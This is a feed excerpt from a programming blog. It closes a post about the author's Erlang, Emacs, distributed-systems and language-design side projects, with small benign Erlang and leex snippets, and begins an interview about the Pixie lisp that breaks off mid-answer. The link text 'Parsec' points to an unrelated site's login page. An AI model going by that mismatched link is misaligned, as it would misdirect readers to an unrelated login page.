&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;unbalancedparentheses&#x2F;tinyerl&quot;&gt;tinyerl&lt;&#x2F;a&gt; is a really small project to show how easy it is to create a URL shortener service in Erlang using different HTTP servers such as cowboy, axiom, elli and leptus. It is meant to teach Erlang. I only need to polish it a little bit and update &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;erlang-lisp-and-haskell&#x2F;become-an-erlang-cowboy-and-tame-the-wild-wild-web-part-i-37f8dd1df160&quot;&gt;Become an Erlang Cowboy and tame the Wild Wild Web — Part I&lt;&#x2F;a&gt; before writing Part II which will be based on tinyerl.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;lunfardo&quot;&gt;lunfardo&lt;&#x2F;h4&gt;
&lt;p&gt;Like most devs, I have tested and used many IDEs: Eclipse, Netbeans, Xcode, Visual Studio, IntelliJ IDEA, RubyMine, PyCharm, Code::Blocks, Aptana. Nevertheless, for the last few years I could never move away from the combination of a good shell like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;fishshell.com&#x2F;&quot;&gt;fish&lt;&#x2F;a&gt; with a good configuration like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;bpinto&#x2F;oh-my-fish&quot;&gt;oh my fish&lt;&#x2F;a&gt;, a customized vim based on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;vim.spf13.com&#x2F;&quot;&gt;spf13&lt;&#x2F;a&gt; distribution, and the simple but great &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;dwm.suckless.org&#x2F;&quot;&gt;dwm&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Tiling_window_manager&quot;&gt;tiling window manager&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;After reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.defmacro.org&#x2F;ramblings&#x2F;lisp.html&quot;&gt;The Nature of Lisp&lt;&#x2F;a&gt; I had been interested in using Lisp, but I never invested enough time to really play with it. After watching a coworker use Emacs and a few good Ruby minor modes, I started using Emacs and its Elisp. Emacs is like a mini operating system. It has a package manager, the best &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;magit&#x2F;magit&quot;&gt;git client&lt;&#x2F;a&gt; I have used, and great modes like paredit, swank-js for editing JavaScript, and undo-tree for treating history as a tree.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-xcDvxVvdrTYMR_WMunTlqw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;This video shows really well how easy it is to hack with Emacs and Lisp.&lt;&#x2F;p&gt;
&lt;p&gt;The only issue I had with Emacs is that I like modal editing à la Vi. Fortunately, Emacs has a great mode called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bling.github.io&#x2F;blog&#x2F;2013&#x2F;10&#x2F;27&#x2F;emacs-as-my-leader-vim-survival-guide&#x2F;&quot;&gt;evil&lt;&#x2F;a&gt; that transforms Emacs into the best Vim editor after Vim.&lt;&#x2F;p&gt;
&lt;p&gt;Inspired by bbatsov’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;bbatsov&#x2F;prelude&quot;&gt;Prelude&lt;&#x2F;a&gt; distribution, I coded my own distribution called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;unbalancedparentheses&#x2F;lunfardo&quot;&gt;lunfardo&lt;&#x2F;a&gt;. It’s still in alpha stage. I am not yet a great Elisp coder and I keep on adding and removing modes and shortcuts. I have not yet committed the code for managing most of the programming languages I use (Python, Ruby, JavaScript, Erlang, C, Haskell).&lt;&#x2F;p&gt;
&lt;p&gt;I am already used to all the Emacs shortcuts but I don’t really like them, so I am changing most of them into more modern ones. The final objective is to use Emacs as the platform, with default shortcuts based on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.sublimetext.com&#x2F;&quot;&gt;Sublime&lt;&#x2F;a&gt; and with a shortcut to quickly toggle vim modal editing on and off. We will see how it works out. I am quite excited about it, but I am not completely sure that it is possible to easily change everything I want in Emacs (especially some shortcuts). So I wouldn’t recommend testing lunfardo yet since it will break very often, but I am pretty sure you can find a few cool ideas and modes in it.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;spawned-shelter&quot;&gt;Spawned Shelter&lt;&#x2F;h4&gt;
&lt;p&gt;Finally, this year I started a collection of the best articles, videos and presentations related to Erlang called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;unbalancedparentheses&#x2F;spawnedshelter&quot;&gt;Spawned Shelter&lt;&#x2F;a&gt;. I wanted to create a static web page like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;superherojs.com&#x2F;&quot;&gt;Superhero.js&lt;&#x2F;a&gt; for Erlang but I have been way too busy. I am pretty sad that I could not do it yet, but I am completely sure it will be finished before the end of this year.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;distributed-systems&quot;&gt;Distributed systems&lt;&#x2F;h3&gt;
&lt;p&gt;Using Erlang, Apache &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;planetcassandra.org&#x2F;what-is-apache-cassandra&#x2F;&quot;&gt;Cassandra&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;highscalability.com&#x2F;zookeeper-reliable-scalable-distributed-coordination-system&quot;&gt;Zookeeper&lt;&#x2F;a&gt; in my last project was the final step I needed to become fully interested in distributed systems. I cannot be more thankful to my previous employers (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;inaka.net&#x2F;&quot;&gt;Inaka&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.erlang-solutions.com&#x2F;&quot;&gt;Erlang Solutions&lt;&#x2F;a&gt;) for giving me the opportunity to work with those tools and to learn from great teammates and our CTO &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;elbrujohalcon&quot;&gt;Brujo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;book.mixu.net&#x2F;distsys&#x2F;&quot;&gt;Distributed systems for fun and profit&lt;&#x2F;a&gt; mini book was the best place for me to start reading about this topic. Christopher Meiklejohn’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;christophermeiklejohn.com&#x2F;distributed&#x2F;systems&#x2F;2013&#x2F;07&#x2F;12&#x2F;readings-in-distributed-systems.html&quot;&gt;reading list&lt;&#x2F;a&gt; also seems very good, but it isn’t a good place to start without knowing a few things beforehand.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, Aphyr’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;aphyr.com&#x2F;tags&#x2F;Jepsen&quot;&gt;posts&lt;&#x2F;a&gt; and talks are also an excellent place to learn from.&lt;&#x2F;p&gt;
&lt;p&gt;After reading about and playing with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;basho.com&#x2F;riak&#x2F;&quot;&gt;Riak&lt;&#x2F;a&gt;, I have already decided that in the next work project where I need to use a distributed database or a key-value store I will give it a try. In the process of reading about Riak, I found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;basho&#x2F;riak_core&quot;&gt;Riak Core&lt;&#x2F;a&gt;, a toolkit for building distributed, scalable, fault-tolerant applications. Before giving it a try I want to implement something like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rzezeski&#x2F;try-try-try&quot;&gt;try-try-try&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Next I want to implement Plan 9’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;@jlouis666&#x2F;eventi-ffd423d82b35&quot;&gt;venti&lt;&#x2F;a&gt;, a network storage system where a hash of the data acts as its address, using Riak and Erlang. It won’t be very different from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;@jlouis666&#x2F;&quot;&gt;Jesper L. Andersen&lt;&#x2F;a&gt;’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jlouis&#x2F;eventi&quot;&gt;code&lt;&#x2F;a&gt;, but my objective is to learn, not to create something new.&lt;&#x2F;p&gt;
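&lt;p&gt;The core idea of venti, content addressing, fits in a few lines of Erlang (a toy sketch of the concept, not Jesper’s implementation): the address of a block is simply the hash of its contents, so identical data is stored once and every read can be verified against its own address.&lt;&#x2F;p&gt;
&lt;pre&gt;&lt;code&gt;%% Store a block under the hash of its contents.
store(Data, Store) -&gt;
    Key = crypto:hash(sha256, Data),
    {Key, maps:put(Key, Data, Store)}.

%% Fetch a block and verify it against its address on the way out.
fetch(Key, Store) -&gt;
    Data = maps:get(Key, Store),
    Key = crypto:hash(sha256, Data),
    Data.
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;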
&lt;p&gt;I hope I will have some spare time to play with the following list of interesting Erlang libraries: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jlouis&#x2F;fuse&quot;&gt;fuse&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jlouis&#x2F;safetyvalve&quot;&gt;safetyvalve&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ferd&#x2F;dispcount&quot;&gt;dispcount&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;inaka&#x2F;worker_pool&quot;&gt;worker_pool&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;duomark&#x2F;epocxy&quot;&gt;epocxy&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ferd&#x2F;pobox&quot;&gt;pobox&lt;&#x2F;a&gt;, and to read the latest book from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;ferd.ca&#x2F;&quot;&gt;Fred Hébert&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.erlang-in-anger.com&#x2F;&quot;&gt;Stuff Goes Bad: Erlang in Anger&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;programming-languages&quot;&gt;Programming Languages&lt;&#x2F;h3&gt;
&lt;p&gt;After going through the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.coursera.org&#x2F;course&#x2F;proglang&quot;&gt;Programming Languages&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.coursera.org&#x2F;course&#x2F;compilers&quot;&gt;Compilers&lt;&#x2F;a&gt; Coursera courses, I became more interested in programming language design and implementation. Then I started experimenting with and reading about &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Lexical_analysis&quot;&gt;lexical analysis&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Compiler-compiler&quot;&gt;parser generators&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.garshol.priv.no&#x2F;download&#x2F;text&#x2F;bnf.html&quot;&gt;BNF grammar&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;trevorjim.com&#x2F;how-to-prove-that-a-programming-language-is-context-free&#x2F;&quot;&gt;context-free grammars&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.reverberate.org&#x2F;2013&#x2F;07&#x2F;ll-and-lr-parsing-demystified.html&quot;&gt;LL and LALR&lt;&#x2F;a&gt; parsing, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;gnuu.org&#x2F;2009&#x2F;09&#x2F;18&#x2F;writing-your-own-toy-compiler&#x2F;&quot;&gt;flex and bison&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.hwaci.com&#x2F;sw&#x2F;lemon&#x2F;lemon.html&quot;&gt;lemon&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; 
href=&quot;http:&#x2F;&#x2F;www.antlr.org&#x2F;&quot;&gt;antlr&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.colm.net&#x2F;open-source&#x2F;ragel&#x2F;&quot;&gt;ragel&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;bnfc.digitalgrammars.com&#x2F;&quot;&gt;bnfc&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;morepypy.blogspot.it&#x2F;2011&#x2F;04&#x2F;tutorial-writing-interpreter-with-pypy.html&quot;&gt;rpython&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;tmcnab.github.io&#x2F;Hyperglot&#x2F;&quot;&gt;hyperglot&lt;&#x2F;a&gt; and how &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;trevorjim.com&#x2F;parsing-is-the-weakest-link&#x2F;&quot;&gt;parsing is the weakest link in software security&lt;&#x2F;a&gt;!&lt;&#x2F;p&gt;
&lt;p&gt;After reading all that, I needed to get my hands dirty, so I followed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.buildyourownlisp.com&#x2F;contents&quot;&gt;Build Your Own Lisp&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;createyourproglang.com&#x2F;&quot;&gt;Create Your Own Programming Language&lt;&#x2F;a&gt;. In the process I got really interested in the simplicity of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;plataforma10.com&#x2F;login&quot;&gt;Parsec&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;fdik.org&#x2F;pyPEG&#x2F;&quot;&gt;PEG parsers&lt;&#x2F;a&gt; (sadly they have some important &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stackoverflow.com&#x2F;questions&#x2F;1857022&#x2F;limitations-of-peg-grammar-parser-generators&quot;&gt;limitations&lt;&#x2F;a&gt;). It’s worth mentioning that I found Parsec while reading the mind-blowing book &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;book.realworldhaskell.org&#x2F;read&#x2F;&quot;&gt;Real World Haskell&lt;&#x2F;a&gt;. You should check &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;bitemyapp&#x2F;learnhaskell&quot;&gt;learnhaskell&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;JakeWheat&#x2F;intro_to_parsing&quot;&gt;intro_to_parsing&lt;&#x2F;a&gt; if you are interested in Haskell and Parsec.&lt;&#x2F;p&gt;
&lt;p&gt;One of my goals for this year is to start writing my own programming language using &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.stephendiehl.com&#x2F;llvm&#x2F;&quot;&gt;Haskell and LLVM&lt;&#x2F;a&gt;. Before that I am doing something easier: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikibooks.org&#x2F;wiki&#x2F;Write_Yourself_a_Scheme_in_48_Hours&quot;&gt;Write Yourself a Scheme in 48 Hours&lt;&#x2F;a&gt;, which also uses Haskell. Obviously, I am not trying to create the next programming language. That might even be impossible until programming language design is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;@jlouis666&#x2F;proglang-design-with-evidence-1444213f3902&quot;&gt;done based on more real evidence&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Someday I hope that I can implement an Erlang clone that runs on the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;jlouisramblings.blogspot.com.ar&#x2F;2013&#x2F;10&#x2F;embrace-copying.html&quot;&gt;really&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;jlouisramblings.blogspot.com.ar&#x2F;2013&#x2F;01&#x2F;how-erlang-does-scheduling.html&quot;&gt;awesome&lt;&#x2F;a&gt; BEAM VM, but that uses indentation à la Python as a way to delimit blocks of code instead of “&lt;strong&gt;,&lt;&#x2F;strong&gt;”, “&lt;strong&gt;;&lt;&#x2F;strong&gt;” and “&lt;strong&gt;.&lt;&#x2F;strong&gt;”. It would be a sort of exact copy of Erlang but without its Prolog terminators. Apparently this has &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;farmdev.com&#x2F;thoughts&#x2F;47&#x2F;making-erlang-indentation-sensitive&#x2F;&quot;&gt;already&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;ulf.wiger.net&#x2F;weblog&#x2F;2008&#x2F;03&#x2F;19&#x2F;indentation-sensitive-erlang&#x2F;&quot;&gt;been&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;ulf.wiger.net&#x2F;weblog&#x2F;2008&#x2F;03&#x2F;20&#x2F;indentation-sensitive-erlang-2&#x2F;&quot;&gt;done&lt;&#x2F;a&gt; by Ulf Wiger, but I would like to do it with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;relops.com&#x2F;blog&#x2F;2014&#x2F;01&#x2F;13&#x2F;leex_and_yecc&#x2F;&quot;&gt;leex and yecc&lt;&#x2F;a&gt;, the lex and yacc of the Erlang toolset, which are used for example by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rvirding&#x2F;luerl&quot;&gt;luerl&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; 
href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rvirding&#x2F;lfe&quot;&gt;lfe&lt;&#x2F;a&gt;. Mariano Guerra has implemented a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;marianoguerra&#x2F;match&quot;&gt;toy language&lt;&#x2F;a&gt;, which is incredibly useful for learning purposes, using leex and yecc before implementing efene, a programming language with C-like syntax that runs on the Erlang platform.&lt;&#x2F;p&gt;
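&lt;p&gt;To give a flavour of the pair: leex turns a .xrl file of regular-expression rules into a tokenizer module, and yecc turns a .yrl BNF-style grammar into an LALR parser. A minimal, hypothetical .xrl that recognizes integers and skips whitespace could look like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Definitions.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;D = [0-9]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Rules.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{D}+        : {token, {int, TokenLine, list_to_integer(TokenChars)}}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[\s\t\n\r]+ : skip_token.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Erlang code.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Compiling this with leex:file&#x2F;1 generates an Erlang scanner module whose string&#x2F;1 function returns the token list that a yecc-generated parser then consumes.&lt;&#x2F;p&gt;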
&lt;p&gt;Since I am a noob in this area and I like to share what I learn, I will continue interviewing language developers and good devs for my &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;indie-programming-languages&quot;&gt;Indie Programming Languages&lt;&#x2F;a&gt; collection. I will publish two interviews in the following weeks. In the meantime you can read:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;p&#x2F;cadbc36418dc&quot;&gt;Indie languages — Interview with Timothy Baldridge, Pixie’s language creator&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;do-you-need-a-cool-project&quot;&gt;Do you need a cool project?&lt;&#x2F;h3&gt;
&lt;p&gt;I won’t be able to do it this year, but I hope that next year I will be able to go through Linux From Scratch’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.linuxfromscratch.org&#x2F;lfs&#x2F;&quot;&gt;guide&lt;&#x2F;a&gt; and the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;littleosbook.github.io&#x2F;&quot;&gt;little book about OS development&lt;&#x2F;a&gt; to scratch the surface of how operating systems work.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;this-is-the-end-my-only-friend-the-end&quot;&gt;This is the end, my only friend, the end&lt;&#x2F;h3&gt;
&lt;p&gt;As you have read, in my free time I am not trying to code anything groundbreaking. For the moment I am only interested in exploring how things work.&lt;&#x2F;p&gt;
&lt;p&gt;Even if this is not your eleventh year in the world of development and you are pretty new, I cannot stress enough how much functional programming will open your mind. At least in my case it has been a mind-blowing experience, since it opened hell’s gates of distributed systems and programming language design and implementation for me. Someday it might be time to return to the old and powerful C, but not yet…&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-zIUcPGRK3us1N3oFwJ8y5w.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Timothy Baldridge, Pixie’s language creator</title>
          <pubDate>Mon, 08 Dec 2014 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/indie-languages-interview-pixie-and-timothy-baldridge/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/indie-languages-interview-pixie-and-timothy-baldridge/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/indie-languages-interview-pixie-and-timothy-baldridge/">&lt;p&gt;We interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;timbaldridge&quot;&gt;Timothy Baldridge&lt;&#x2F;a&gt;, creator of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;pixie-lang&#x2F;pixie&quot;&gt;Pixie&lt;&#x2F;a&gt;, a small, fast, native lisp with &lt;em&gt;magical&lt;&#x2F;em&gt; powers. We hope you try it out!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-jYqNf1VQpmxhv7WwkPm1Ag.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;“In modern use, Pixie can be synonymous with fairies or sprites”&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Please tell us a little bit about Pixie’s inception and the road to the current status.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-s4cstPwICRsq-gb1zJ261Q.jpeg&quot; alt=&quot;&quot; &#x2F;&gt; Timothy Baldridge&lt;&#x2F;p&gt;
&lt;p&gt;I’ve been a language hacker for years, and have played around with RPython (PyPy’s tool-chain) for some time. I’ve always had it in the back of my head that a lisp on RPython would be a good project. But it seems like this time it’s really taken off.&lt;&#x2F;p&gt;
&lt;p&gt;I started the project about 3 months ago, and by now it’s grown quite a bit. The standard library is about to hit 2000 loc (lines of code), and we have about half a dozen contributors. Not bad for only a few months’ work.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why a new language? Is Pixie an exercise in language design, an attempt to build a language to target production code or is that still to be determined?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
There are a few experiments I’ve tried at different times in Pixie’s lifecycle, but at this point I’m really aiming for Pixie to be a “Python-esque lisp”. That is to say, if you’re doing lightweight scripting, or want something that boots fast and runs well on low-end systems, Pixie might be a good fit. Basically I want it for all those times I’d reach for Python instead of Clojure.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are Pixie’s main features?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;It’s a lisp.&lt;&#x2F;li&gt;
&lt;li&gt;It stresses the use of immutable data structures.&lt;&#x2F;li&gt;
&lt;li&gt;It’s not hosted on the CLR, JVM or any other pre-existing VM.&lt;&#x2F;li&gt;
&lt;li&gt;It’s quite fast as it includes a tracing JIT.&lt;&#x2F;li&gt;
&lt;li&gt;FFI (&lt;em&gt;Foreign Function Interface&lt;&#x2F;em&gt;) support is currently quite primitive, but an FFI on par with Python’s ctypes or Lua’s FFI is planned and in the works.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;What is the reason behind including transducers from the start?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Much of what is needed for a robust run-time can be built with transducers. Operations such as hashing a collection, converting a collection to a string, or even comparing two collections, can be built with transducers. And since the JIT produced by RPython is a tracing (instead of a method) JIT, transducers are extremely efficient, often faster than transducers implemented in other languages.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why would developers choose Pixie? Who are Pixie’s target users?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
If you like Clojure, but are unhappy with the start-up time, or if you want something outside of the JVM ecosystem, then Pixie may be for you. For much of my work Clojure is a perfect choice, but once in a while I find myself reaching for a lighter language, like Python. Hopefully Pixie will allow me to stay in a Lisp in those situations as well.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you implement it in Python?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
